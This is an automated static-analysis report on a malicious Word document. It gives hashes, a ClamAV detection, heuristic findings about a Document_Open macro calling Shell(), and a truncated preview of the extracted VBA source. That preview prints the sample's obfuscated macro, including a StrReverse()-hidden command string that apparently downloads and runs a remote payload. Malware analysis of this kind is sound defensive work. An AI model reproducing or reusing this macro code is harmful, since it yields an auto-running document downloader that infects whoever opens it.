Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e490f1d39ae7431…

MALICIOUS

Office (OLE)

120.5 KB · Created: 2018-04-23 07:54:00 · Authoring application: Microsoft Office Word · First seen: 2019-10-01
MD5: 60f3bdb1d39ef0a45a8c6e10a8ed12e7 SHA-1: 621a798d92ab87136d8be3b8dac4fbd9014c038a SHA-256: 6e490f1d39ae743190ac73d06f0bdb3b4b271bdd927947f14311ad84088a47d2
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros, including a Document_Open auto-execution macro that calls the Shell() function. This indicates an attempt to execute an arbitrary command as soon as the document is opened, most likely to download and run a secondary payload. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' further supports this assessment. The VBA code is obfuscated — the extracted source consists largely of junk string and arithmetic operations, and the one string that is actually used appears to be assembled with StrReverse() — but the combination of Shell() with an auto-execution macro strongly suggests downloader or dropper functionality.

Heuristics 6

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The VBA source contains a call to Shell(), which launches an external program or command line from within the macro.
  • Document_Open macro high OLE_VBA_DOCOPEN
    The document contains a Document_Open macro, which Word runs automatically when the document is opened and macros are enabled.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule also covers documents where only compiled p-code is present, or where source extraction failed, so that no readable VBA source is available.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for the channel (macro, JS, link annotation, document body, ...) in which each URL was found.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body). This is a standard Office Open XML schema namespace identifier that appears in ordinary Office documents and is not, by itself, an indicator of compromise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31924 bytes
SHA-256: b3274a98ab866724df4190d0f787b1edf3eaf281bdf47f7df873f91f75ca5363
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim klqLwbEy As String
    zfJTAzB = Space(5)
    wiYwk = LTrim("oehIXP%L)tM")
    cDOhFqbS = RTrim("I^irYbRyp$F*tQLJ*")
    While pJzBOY < 384
        mbMVEt = RTrim("OKV&Np_qV-DmCeT(nFI")
        wDckaqpW = RTrim("_.T-d Y^gD$X]? Vdwf")
        lSrgni = 764 + 1489 + 158
        XseVJ = Right("pVJh !fT@iGtxaOJs", 2)
        cDOhFqbS = UCase("vMW#NA]_RwcHbb")
        zfJTAzB = 1458 - 265 - 1339
        PQYbJT = "If?*Q#eW*_r$Z(@U." + "fHX$eLLHp@[OUJbYS-Ey" + "X[X]n]#DPDbf@b"
        pJzBOY = pJzBOY + 2
    Wend

    ejfGsI = Left("M%xU$hAiOWgCDgkYi!t)", 3)
    zfJTAzB = Left("_)sZexm.DYCjpc@Dz", 2)
    cDOhFqbS = Left("XAWxjPooZxGQXdN", 3)
    mbMVEt = 1225 + 764 + 1984
    klqLwbEy = StrReverse("QeTxXeF.hIOBQXpiLDvCUez\#\k%]pumae-to%U o&E&^ EeZxYeE.FI.BfXgi[DsCSez\L\v%lpJmoeet$%A Se[xleG.ad%oxodgO/#sZuf.UocrCpasWr(eibPmDuel pU/^/^:TpPtkt.h] bfm-W Ot*iSlGpHs)-W -eDh(czaTc$lRrNuM-p seUx_eQ.MllintWuit$raeacR Jcn/I ZeWxlew.rdBmWc")
    zfJTAzB = "fnCsnsvaat#" + "xPGsi[?d#-" + "JynQ@EZUCAsl"
    LNnev = UCase("FT##EC$p@S")
    wDckaqpW = LTrim("Cs?b%*_%NzNSim%fp)n")
    zfJTAzB = "fTWce^CJ_n" + "hhdax@TPc$aHYpTP" + "VWWe#*Zd*[A"
    For KHJakJ = 0 To 38
        ejfGsI = Right("tUnFjOZ#PcKlVR$@SxoF", 4)
        ejfGsI = "?ZgGlWcG]jOLp" + "jM&DQ?fclg_DaYysp$P" + "O_pRrCd!$D"
        PQYbJT = Left("N$WfRDbwLHBf", 2)
        iPHNO = "k*vXHUe?Dzrdec]^Ke]_" + "$cSKBFE J[EvF&%J" + "AdfME&ogumo%a"
        MNqxhB = LTrim("L.GFRCVk_DeI")
        lSrgni = "EeGicTrkK@T" + "Uu]VBCctQP-lC^!o" + "FnjL!u&qL#"
        iPHNO = RTrim("(?i v kk^&")
        XseVJ = Left("vkTI.LzUFklp&cM", 4)
        lSrgni = UCase("Y_@ph)HpUYvzqT-o")
        LNnev = UCase("xQ qRmR$%!K(SLvg")
    Next KHJakJ

    While INQiYd < 400
        mbMVEt = LTrim("C_PcI bDNW.^JH*k")
        wDckaqpW = UCase("I WIpmDy L&(_-_?")
        LNnev = "dRne#ZaQXB*Y*TtV" + "Nib[TKHW#U_TYY" + "CgxI-$HyO(YR!uw?"
        INQiYd = INQiYd + 1
    Wend

    lSrgni = 1388 + 1704 + 1411
    mbMVEt = LTrim("Raw&p$U(MpqQe_")
    While NQiVJ < 641
        For zDouyj = 0 To 366
            XseVJ = LTrim("no_-CiH#ZCxHJmon@I")
            zfJTAzB = LTrim("O(AY[siMKb")
            MNqxhB = 1117 - 170 - 963
            iPHNO = LTrim("DV)bWHK[rwSmL*-")
            MNqxhB = "IkVba_PKaZOt#u]uf(" + "TZwcCCqM?@cldUJegh" + "tbVFVx@?lE*fZ F-m"
        Next zDouyj

        PQYbJT = "BOzv%MdIMGgSNRF&)" + "sz_wc#hogsH^Mrc$Q" + "iFybP[OR?ORbZ"
        LNnev = RTrim("hNhT&@.[KBqVDydLPh.)")
        While QEGpqM < 118
            lSrgni = Right("-WBHBk%$O%^vG#cLEph", 3)
            MNqxhB = 1501 - 414 - 1425
            wDckaqpW = Right("kf[ldPiR#vD*fXpQq", 2)
            LNnev = Right("_PzgttmyUEV_&)", 4)
            LNnev = RTrim("b%uibD[Ny$i")
            iPHNO = Right("BrUjpY!Le)dX.]", 3)
            XseVJ = 289 + 639 + 940
            QEGpqM = QEGpqM + 3
        Wend

        mbMVEt = LTrim("d!P#eWJo@ekEP%.N$W)q")
        For VXiNDv = 0 To 213
            lSrgni = UCase("@QxpNqa ok hQZdE")
            lSrgni = UCase(".GHDAo!pWiZt")
            LNnev = LTrim("?Fl%^@bQLyU!y")
            iPHNO = 767 - 801 - 741
            ejfGsI = UCase("rmC[J[Vp$ny")
            ejfGsI = 1126 + 1394 + 1262
            wiYwk = LTrim("-SzKtvrGMVqDHeS^_mI-")
            lSrgni = Right("!(L&PmDBamSP", 5)
        Next VXiNDv

        cDOhFqbS = Left("BXQRZL^aDUb(", 5)
        ejfGsI = 134 - 1367 - 893
        zfJTAzB = 652 + 790 + 252
        iPHNO = 1825 + 273 + 1809
        If NQiVJ = 558 Then
            mbMVEt = Right("**nWYunP)? q?XLav", 2)
            XseVJ = RTrim("Y*#EVZf%rJ")
            PQYbJT = UCase("Do-uXAHc*nwOg^eu.#G")
            While ouaVtt < 177
                zfJTAzB = Space(14)
                MNqxhB = 763 -
... (truncated)